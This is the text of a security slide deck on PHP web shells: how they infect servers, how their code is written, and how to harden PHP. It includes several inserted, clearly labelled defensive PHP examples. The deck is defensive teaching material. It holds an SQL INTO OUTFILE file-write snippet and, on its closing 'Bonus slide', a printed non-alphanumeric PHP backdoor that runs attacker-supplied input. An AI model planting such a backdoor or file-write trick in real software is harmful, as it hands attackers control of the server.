Anatomy of PHP shell scripts
Vedran Krivokuća, <vedran.krivokuca@nimium.hr>
Ivan Špoljarić, <ivan.spoljaric@nimium.hr>
A little about PHP shells in general
What are PHP shell scripts?
● Scripts written (mostly) in PHP*;
● Placed on a server (mostly under existing PHP sites) without authorization from the server/web site owner;
● Used for "unauthorized maintenance" of the infected server;
● By "unauthorized maintenance", we mean literally anything.
"Unauthorized maintenance"
● Running applications/scripts (with root privileges)
● "Piggybacking" on existing local exploits
● Modifying files
● Changing user passwords
● Enabling/disabling/reconfiguring system services
● Dumping, destroying and modifying databases
● Opening new backdoors to the system
Are there "the best" PHP shells?
● Surprisingly, yes: C99shell and all of its derivatives seem to be the most widespread PHP shells out there.
● There are literally thousands of PHP shell scripts out there; quality varies.
Methods of infection by PHP shells
Root Of All Evil
● Documentation for PHP, not the language itself, is the root of all evil.
● You don't believe it? This is how bad it is:
How hard could this possibly be?
Documented possible pitfalls
● But most of the responsibility is on the programmer.
● The PHP team often does a good job describing possible security pitfalls in their documentation.
Documented possible vulnerabilities
● attacks through standard filesystem functions which allow socket operations, like fopen(), include(), require()...*
● attacks through unvalidated upload forms (not documented clearly enough, obviously...)
● in the worst-case scenario, due to a constellation of multiple bugs/vulnerabilities/weak setup, an attacker might even use SQL injection to write files on your server!
    mysql> SELECT `injected_malicious_data`
           FROM `yourtable`
           INTO OUTFILE "file.php"
Other methods of infection
● Legend says there were infections with shell scripts through stolen FTP credentials.
So, it's about time you change your "god", "sex" and "love" stuff. Also, change those "password" and "password123". In other words, your server's security is only as strong as its weakest link.
● On shared hosting environments without proper user account isolation, it might not even be you who is infected but another shared hosting client. Consult hosting support in order to track down how you were attacked.
What if...?
And now the interesting part...
Let's take a peek at PHP shells code
General architecture
● Rather clever, if not smart, architecture
● Written mostly in PHP, but can carry any exploit code inside the PHP source in binary (compiled) form (mostly base64 encoded within variables), or even download the needed exploits (source or binary) from 3rd party sites, then compile and/or run them.
● If needed, can pull its own components from 3rd party sites.
Quick development cycle
● Decentralized development
  ● Resulting in many variations of all PHP shells in the wild
● Code is often adapted to such a development process, usually protecting itself against redefinition of crucial components (if (!function_exists(...)) guards prior to all important definitions)
● Can rely on 0-day exploits!
Quick development cycle
● The scary part: it's a really short way from a "plain PHP shell" to a full-blown bot script controlled through IRC
Coding style
● Not written by your know-just-a-little-coding regular PHP dev (no pun intended)
● You'll see what I mean...
Coding style
● Well documented code:
    function mysql_query_parse($query, $output_type)
    {
        /*
        if output_type == 0, no output,
        if output_type == 1, no output if no error
        if output_type == 2, output without control-buttons
        if output_type == 3, output with control-buttons
        */
        ...
    }
Coding style
● Proper understanding and usage of variable scopes:
    function c99fsearch($d)
    {
        global $found;
        global $found_d;
        global $found_f;
        global $search_i_f;
        global $search_i_d;
        global $a;
        ...
    }
Coding style
● It's usually safer code than much of the production PHP code in the wild:
  ● If it's a cross-platform shell, it performs checks before calling a function unavailable on other platform(s)
  ● Variables included in HTML output are escaped, so there is no easy path to unwanted XSS
  ● SQL query parameters are also escaped, so there is no easy path to unwanted SQL injection
Coding style
● Variable/function name obfuscation is done in roughly half (50:50) of the PHP shells we collected
● External URLs, usernames and passwords are almost always encoded, using either base64 or some kind of ASCII-code-to-hex conversion
● Obviously not for real protection, but as obfuscation against the most obvious pattern searching during detection attempts*
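The obfuscation traits listed on this slide, together with the function_exists() guards from the "Quick development cycle" slide, are exactly what a first-pass file scanner can look for. The following is an added example written for this transcript, not code from the slides or from any shell: a heuristic PHP CLI scanner that scores a source file against those traits. The indicator patterns, their weights and the threshold are assumptions chosen for the demo, and the two embedded inputs are constructed samples, not real shells; a hit means "have a human look at this", nothing more.

```php
<?php
// Added example, not from the slides: a triage scanner for the obfuscation traits the
// deck describes (encoded literals, eval of decoded data, non-alphanumeric array code,
// function_exists() guards). Patterns and weights are assumptions for this demo.
declare(strict_types=1);

const INDICATORS = [
    // name => [PCRE pattern, weight]
    'eval_of_decoded'       => ['/\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(/i', 5],
    'exec_of_request_input' => ['/\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b/i', 5],
    'non_alnum_array_code'  => ['/\$_\[\s*@[!+-]/', 4],
    'long_base64_literal'   => ['/[\'"][A-Za-z0-9+\/]{120,}={0,2}[\'"]/', 3],
    'hex_escaped_string'    => ['/(\\\\x[0-9a-fA-F]{2}){6,}/', 3],
    'chr_concatenation'     => ['/(chr\s*\(\s*\d+\s*\)\s*\.\s*){4,}/i', 3],
    'function_exists_guard' => ['/!\s*function_exists\s*\(/i', 1],
];

function scan_source(string $code): array {
    $hits = [];
    $score = 0;
    foreach (INDICATORS as $name => [$pattern, $weight]) {
        $count = (int) preg_match_all($pattern, $code);
        if ($count > 0) {
            $hits[$name] = $count;
            $score += $weight * min($count, 3); // cap so one repeated trait does not dominate
        }
    }
    return ['score' => $score, 'hits' => $hits];
}

function scan_file(string $path, int $threshold = 5): array {
    $result = scan_source((string) file_get_contents($path));
    $result['path'] = $path;
    $result['suspicious'] = $result['score'] >= $threshold;
    return $result;
}

// Constructed samples (neither is a real shell): an ordinary script, and a snippet that
// combines three of the traits above around a harmless echo.
$benign = "<?php\nfunction greet(string \$n): string { return 'hi ' . \$n; }\necho greet('there');\n";
$constructed = "<?php\nif (!function_exists('x')) { function x() {} }\n"
    . "eval(base64_decode('" . base64_encode("echo 'constructed sample';") . "'));\n"
    . '$p = "\x73\x61\x6d\x70\x6c\x65";' . "\n";

foreach (['benign' => $benign, 'constructed' => $constructed] as $label => $src) {
    $r = scan_source($src);
    printf("%-12s score=%2d hits=%s\n", $label, $r['score'], json_encode($r['hits']));
}

// Usage on a document root: php scan.php /var/www (script name and path are assumptions).
if (PHP_SAPI === 'cli' && isset($argv[1]) && is_dir($argv[1])) {
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($argv[1], FilesystemIterator::SKIP_DOTS));
    foreach ($files as $file) {
        if (!preg_match('/\.(php|phtml|php[57]|inc)$/i', $file->getFilename())) {
            continue;
        }
        $r = scan_file($file->getPathname());
        if ($r['suspicious']) {
            printf("SUSPICIOUS %s score=%d hits=%s\n", $r['path'], $r['score'], json_encode($r['hits']));
        }
    }
}
```

Scores are capped per indicator so that a legitimate library full of function_exists() guards does not outscore a short file that evals decoded data; treat the output as a work list, and compare flagged files against a known-good copy of the site before acting.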
GUI
● Mostly quite ugly but always very efficient
● Sortable table outputs on every field
● You might be tempted to administer your server solely through PHP shell scripts. :-)
Defensive measures
There are no shortcuts!
These recommendations are best suited to hosters, but developers are also invited to keep them in mind!
System preparation
● Whenever possible, chroot, or go even further with isolation of different web sites on the same machine (containers/pseudo-virtualization/virtualization), limiting potential damage to just one site.
● Regularly update your server's OS – PHP shells (as we've learned) can bring along local exploits.
● Seriously consider complex password policies if you're running a shared hosting environment.
Global PHP configuration
● Disable the potentially dangerous socket functionality of the filesystem PHP functions if you don't need it (allow_url_fopen, allow_url_include in php.ini); if you're not sure – you don't need it.
● When editing, keep in mind some systems (*cough*Debian*cough*) may have multiple php.ini files (one for mod_php, one for CLI, one for CGI...). Take care of them all.
● Follow the usual security principles in server administration and maintenance.
Global PHP configuration
● Consider further crippling PHP by disabling at least the program execution functions if you don't need them (through disable_functions).
● Which are those?
http://www.php.net/manual/en/ref.exec.php
● Leave something enabled from the program execution functions?* escapeshellarg(), escapeshellcmd()
● While on that subject – you can't disable eval() like this. :-)
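Because each SAPI may load its own php.ini, the only reliable way to know what a given PHP actually allows is to ask that PHP. The following is an added example, not code from the slides: a CLI audit script that reports which php.ini files the running SAPI loaded, whether the URL wrappers are on, and which program execution functions are still callable, applying the advice of the two slides above (keep escapeshellarg()/escapeshellcmd(), and note that eval cannot be disabled this way). The list of execution functions is the one from the manual page the slide links; popen() and pcntl_exec() are added because they start processes too. Run it once per SAPI you expose.

```php
<?php
// Added example, not from the slides: audit the running PHP's own settings against the
// hardening points on the "Global PHP configuration" slides. Run it under each SAPI you
// expose (mod_php via a web request, php-cgi, php-cli): each may load a different php.ini.
declare(strict_types=1);

// The functions in the manual's "Program execution" section (ref.exec.php), minus the
// two sanitizers escapeshellarg()/escapeshellcmd(), which should stay enabled.
const EXEC_FUNCTIONS = ['exec', 'passthru', 'proc_close', 'proc_get_status', 'proc_nice',
    'proc_open', 'proc_terminate', 'shell_exec', 'system'];
// Documented elsewhere in the manual but just as capable of starting a process:
// popen() is a filesystem function, pcntl_exec() belongs to the PCNTL extension.
const EXTRA_EXEC_FUNCTIONS = ['popen', 'pcntl_exec'];

function ini_flag_on(string $name): bool {
    return in_array(strtolower((string) ini_get($name)), ['1', 'on', 'true', 'yes'], true);
}

function disabled_functions(): array {
    $list = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    return array_values(array_filter($list, 'strlen'));
}

// Returns human-readable findings; an empty list means nothing to report.
function audit_runtime(): array {
    $findings = [];
    if (ini_flag_on('allow_url_fopen')) {
        $findings[] = 'allow_url_fopen=On: fopen()/file_get_contents() accept http:// and ftp:// URLs';
    }
    if (ini_flag_on('allow_url_include')) {
        $findings[] = 'allow_url_include=On: include()/require() can pull code from a URL';
    }
    foreach (array_merge(EXEC_FUNCTIONS, EXTRA_EXEC_FUNCTIONS) as $fn) {
        // function_exists() is false both for extensions that are not loaded and for
        // functions removed by disable_functions, so this reports what is really callable.
        if (function_exists($fn)) {
            $findings[] = "$fn() is callable; add it to disable_functions if nothing needs it";
        }
    }
    foreach (['escapeshellarg', 'escapeshellcmd'] as $fn) {
        if (!function_exists($fn)) {
            $findings[] = "$fn() is disabled; it is a sanitizer, not an execution function";
        }
    }
    if (in_array('eval', disabled_functions(), true)) {
        $findings[] = 'disable_functions names eval, which does nothing: eval is a language construct';
    }
    return $findings;
}

printf("SAPI:              %s\n", PHP_SAPI);
printf("Loaded php.ini:    %s\n", php_ini_loaded_file() ?: '(none)');
printf("Additional .ini:   %s\n", php_ini_scanned_files() ?: '(none)');
printf("disable_functions: %s\n", implode(', ', disabled_functions()) ?: '(empty)');
$findings = audit_runtime();
echo $findings ? "Findings:\n" : "No findings.\n";
foreach ($findings as $f) {
    echo " - $f\n";
}
```

To cover mod_php, drop the script into a directory served by the web server and request it once, then delete it; the CLI run alone only tells you about the CLI's php.ini, which is the trap the Debian remark on the previous slide warns about.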
Follow good coding practices
● Always be checking uploaded files! (it is incredible how much code does not do any kind of checks)
● Keep in mind not to rely on $_FILES[…]['type']. Why?
$_FILES[...]["type"]
Ok, how to check uploaded files?
● In general, checking the file extension could serve you well... If you don't stop at that alone, use it as the primary defense measure.
● That might just not be enough sometimes. You might want to step up this game:
  ● check the MIME type on the server. On Linux, you can use the external file(1) utility, assuming you haven't disabled program execution functions.
  ● We'll see how others do it later.
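The checks on this slide, in the order it suggests, as an added example written for this transcript (not code from the slides or from any of the projects discussed later): extension allow-list first, then the MIME type determined from the file's bytes, then, for images, an actual decode attempt with getimagesize(). The client-supplied $_FILES[...]['type'] is deliberately never consulted. The MIME detection uses PHP's finfo extension (libmagic), which gives the same answer as file(1) without needing the program execution functions you may have disabled. The allow-list, the size limit and the sample file names are assumptions for the demo.

```php
<?php
// Added example, not from the slides: server-side upload checks that never trust
// $_FILES[...]['type']. Allow-list, size limit and sample names are demo assumptions.
declare(strict_types=1);

// Allowed extensions and the MIME type(s) the file's bytes must actually report.
const ALLOWED = [
    'jpg'  => ['image/jpeg'], 'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],  'gif'  => ['image/gif'],
    'pdf'  => ['application/pdf'],
];
const MAX_BYTES = 5 * 1024 * 1024;

// Returns [accepted, reason, storage name or null].
function validate_upload(string $tmpPath, string $originalName): array {
    if (!is_file($tmpPath)) {
        return [false, 'not a regular file', null];
    }
    if (filesize($tmpPath) > MAX_BYTES) {
        return [false, 'too large', null];
    }
    // 1. Name hygiene and extension allow-list. Only the last extension counts, so
    //    "shell.php.jpg" is judged as "jpg" and must then survive the content checks.
    if ($originalName !== basename($originalName) || preg_match('/[\x00-\x1f]/', $originalName)) {
        return [false, 'unsafe file name', null];
    }
    $ext = strtolower((string) pathinfo($originalName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return [false, "extension '$ext' not allowed", null];
    }
    // 2. MIME type from the bytes on disk via libmagic: what file(1) would report,
    //    without needing the program execution functions.
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        return [false, "content is $mime, expected " . implode('/', ALLOWED[$ext]), null];
    }
    // 3. For images, require that PHP's image decoder recognises the file.
    if (strncmp($mime, 'image/', 6) === 0 && @getimagesize($tmpPath) === false) {
        return [false, 'image does not parse', null];
    }
    // 4. Never store under the client's name: random name, vetted extension.
    return [true, 'ok', bin2hex(random_bytes(16)) . '.' . $ext];
}

// Constructed inputs: a file of PHP source presented under image names, and a genuine
// 1x1 PNG, written to temp files so the demo runs offline.
$tmp = sys_get_temp_dir();
$scriptBytes = tempnam($tmp, 'up');
file_put_contents($scriptBytes, "<?php echo 'these bytes are not an image';\n");
$pngBytes = tempnam($tmp, 'up');
file_put_contents($pngBytes, base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
));

$cases = [
    [$scriptBytes, 'avatar.jpg'],      // script bytes behind an image name
    [$scriptBytes, 'shell.php'],       // disallowed extension
    [$scriptBytes, 'shell.php.jpg'],   // double extension
    [$scriptBytes, '../../evil.png'],  // path separators in the name
    [$pngBytes,    'logo.png'],        // real image
];
foreach ($cases as [$path, $name]) {
    [$ok, $why, $stored] = validate_upload($path, $name);
    printf("%-16s %s: %s%s\n", $name, $ok ? 'ACCEPT' : 'REJECT', $why, $stored ? " -> $stored" : '');
}
unlink($scriptBytes);
unlink($pngBytes);
```

In a real handler, first check $_FILES['f']['error'] === UPLOAD_ERR_OK and is_uploaded_file($_FILES['f']['tmp_name']), pass tmp_name and name to validate_upload(), and on acceptance move_uploaded_file() the result into a directory that the web server does not execute PHP from. Only the last step keeps a correctly named, correctly typed file from ever being run as code.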
Follow good coding practices
● Always be sanitizing and validating inputs. PHP shells can be injected through various vectors:
  ● Apply programming techniques to eliminate possible SQL injections (escaping, parametrization...)
  ● Always be escaping shell commands you execute and their arguments.
  ● Always double-check the filenames of files (and their paths!) you handle from the code!
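The three rules on this slide in working PHP, as an added example written for this transcript (not code from the slides): a parametrised query in place of string concatenation, escapeshellarg() around every shell argument, and a path helper that accepts a bare file name only and confines it to one directory. It uses an in-memory SQLite database through PDO so it runs without a database server; the table layout, the sample rows, the constructed inputs and the directory used are assumptions for the demo.

```php
<?php
// Added example, not from the slides: the "Follow good coding practices" rules in code.
// Needs the pdo_sqlite extension; table, rows and inputs are constructed for the demo.
declare(strict_types=1);

// SQL: parametrise. The concatenated form this replaces would be
//   $db->query("SELECT id, name FROM users WHERE name = '$name'");
function find_user(PDO $db, string $name): ?array {
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Shell: every argument through escapeshellarg(), so whatever the name contains it
// reaches the program as one argument instead of being parsed by the shell.
function build_file_command(string $path): string {
    return 'file --brief --mime-type ' . escapeshellarg($path);
}

// Paths: accept a bare file name only, and confine the result to one base directory.
function resolve_in_dir(string $baseDir, string $userName): ?string {
    $base = realpath($baseDir);
    if ($base === false || $userName === '' || strpos($userName, "\0") !== false) {
        return null;
    }
    // No separators, no "." or "..": the name must be its own basename.
    if (basename($userName) !== $userName || in_array($userName, ['.', '..'], true)) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $userName;
    // If the target already exists, make sure a symlink did not lead out of the base.
    $resolved = realpath($candidate);
    if ($resolved !== false && strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$db->exec("INSERT INTO users (name) VALUES ('alice'), ('bob')");

// A quote in the input is data, not SQL: the second lookup simply finds no such user.
foreach (['alice', "alice' OR '1'='1"] as $input) {
    printf("find_user(%s) => %s\n", var_export($input, true), json_encode(find_user($db, $input)));
}
echo build_file_command('report; id.txt'), "\n";
foreach (['notes.txt', '../etc/passwd', 'sub/dir.txt', '..'] as $name) {
    printf("resolve_in_dir(%s) => %s\n", var_export($name, true),
        resolve_in_dir(sys_get_temp_dir(), $name) ?? 'rejected');
}
```

The path helper is deliberately strict: it refuses anything that is not a plain name rather than trying to clean up traversal sequences, because normalising "../" is exactly the kind of code that keeps getting bypassed. Where users genuinely need subdirectories, map their input to an identifier and look the real path up on the server side.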
How do others defend themselves?
(three examples)
WordPress
● As far as file uploads go, WordPress checks uploaded media types by instantiating them in the respective modules (e.g. calls GD's getimagesize() on images)
● WordPress is generally a very safe CMS. 3rd party plugins are usually the source of security issues and PHP shell infections.
Roundcube webmail
● Puts no limitation itself on the uploaded content, since it is attached to e-mail messages and then deleted from temporary locations.
● Is it possible to attack remote e-mail clients like that? Depending on the destination client, it's possible. Not something Roundcube devs should or could focus on.
Dokuwiki
● Guesses the MIME type by extension, and you limit the allowed MIME types for upload through configuration.
● You can enable upload of "dangerous file types" if you want.
Bonus slide
What happens when frustrated Sendmail administrators write PHP shells?
http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
@$_[]=@!+_;
$__=@${_}>>$_;
$_[]=$__;
$_[]=@_;
$_[((++$__)+($__++ ))].=$_;
$_[]=++$__;
$_[]=$_[--$__][$__>>$__];
$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] = ($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .= ($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .= ($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_]);
#ep1cw1n

More Related Content

What's hot

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
Pichaya Morimoto
 
Understand study
Understand studyUnderstand study
Understand study
Antonio Costa aka Cooler_
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
Yury Chemerkin
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
Antonio Costa aka Cooler_
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
Rob Fuller
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
jaredhaight
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
n|u - The Open Security Community
 
Flashack
FlashackFlashack
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
Csaba Fitzl
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
jaredhaight
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
Nikto
NiktoNikto
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
jaredhaight
 
0d1n
0d1n0d1n
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NoSuchCon
 

What's hot (20)

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
 
Understand study
Understand studyUnderstand study
Understand study
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
 
Flashack
FlashackFlashack
Flashack
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Nikto
NiktoNikto
Nikto
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
0d1n
0d1n0d1n
0d1n
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
 

Similar to Anatomy of PHP Shells

Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass Firewalls
Netsparker
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
jemtallon
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
Mohmad Feroz
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
CTruncer
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
Andrew Sorensen
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
Positive Hack Days
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
Positive Hack Days
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSS
qqlan
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
CTruncer
 
IT glossary
IT glossaryIT glossary
Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Chapter 1: Introduction to Command Line
Chapter 1: Introduction  to Command LineChapter 1: Introduction  to Command Line
Chapter 1: Introduction to Command Line
azzamhadeel89
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
nullowaspmumbai
 
PHP ITCS 323
PHP ITCS 323PHP ITCS 323
PHP ITCS 323
Sleepy Head
 
Learn PHP Lacture1
Learn PHP Lacture1Learn PHP Lacture1
Learn PHP Lacture1
ADARSH BHATT
 
Chapter 1: Introduction to Command Line
Chapter 1: Introduction to  Command LineChapter 1: Introduction to  Command Line
Chapter 1: Introduction to Command Line
azzamhadeel89
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
Giuseppe Paterno'
 

Similar to Anatomy of PHP Shells (20)

Hacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass FirewallsHacking Vulnerable Websites to Bypass Firewalls
Hacking Vulnerable Websites to Bypass Firewalls
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 
Root via XSS
Root via XSSRoot via XSS
Root via XSS
 
Denis Baranov: Root via XSS
Denis Baranov: Root via XSSDenis Baranov: Root via XSS
Denis Baranov: Root via XSS
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
 
IT glossary
IT glossaryIT glossary
IT glossary
 
Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Linux Internals - Part I
 
Chapter 1: Introduction to Command Line
Chapter 1: Introduction  to Command LineChapter 1: Introduction  to Command Line
Chapter 1: Introduction to Command Line
 
Fuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 JuneFuzzing | Null OWASP Mumbai | 2016 June
Fuzzing | Null OWASP Mumbai | 2016 June
 
PHP ITCS 323
PHP ITCS 323PHP ITCS 323
PHP ITCS 323
 
Learn PHP Lacture1
Learn PHP Lacture1Learn PHP Lacture1
Learn PHP Lacture1
 
Chapter 1: Introduction to Command Line
Chapter 1: Introduction to  Command LineChapter 1: Introduction to  Command Line
Chapter 1: Introduction to Command Line
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
